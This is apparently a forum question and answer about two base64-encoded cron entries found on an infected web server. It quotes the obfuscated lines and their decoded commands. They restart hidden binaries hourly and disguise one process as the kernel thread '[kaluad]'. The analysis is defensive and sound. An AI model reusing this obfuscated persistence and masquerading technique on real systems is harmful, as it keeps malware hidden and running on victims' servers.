Found Base64-encoded commands in cron scheduler. What does it do?
I found 2 strings in cron scheduler:
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDEwIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9IFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL3Zhci93d3cvd3d3LXJvb3QvZGF0YS8uY29uZmlnL2h0b3AvZGVmdW5jdC5kYXQgLWxpcUQiIC91c3IvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ1trYWx1YWRdJyAnL3Zhci93d3cvd3d3LXJvb3QvZGF0YS8uY29uZmlnL2h0b3AvZGVmdW5jdCciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
# DO NOT REMOVE THIS LINE. SEED PRNG. #core-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDEwIGNvcmUgMj4vZGV2L251bGwgfHwgJy92YXIvd3d3L3d3dy1yb290L2RhdGEvLmNvbmZpZy9odG9wL2NvcmUnIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng core-kernel

Base64 decoded substrings are:
/usr/bin/pkill -0 -U1010 defunct 2>/dev/null || SHELL= TERM=xterm-256color GS_ARGS="-k /var/www/www-root/data/.config/htop/defunct.dat -liqD" /usr/bin/bash -c "exec -a '[kaluad]' '/var/www/www-root/data/.config/htop/defunct'" 2>/dev/null


/usr/bin/pkill -0 -U1010 core 2>/dev/null || '/var/www/www-root/data/.config/htop/core' 2>/dev/null

Please explain what these commands do?

They continuously try to start the programs /var/www/www-root/data/.config/htop/core and /var/www/www-root/data/.config/htop/defunct if those are not yet running (pkill with a 0 signal is used to test if the process is already running). The former also uses exec to disguise the process name as "[kaluad]" (to make it look like a kernel thread).
Both look like fairly standard "Your webserver is infected with a cryptocoin miner and who knows what else" cron jobs.
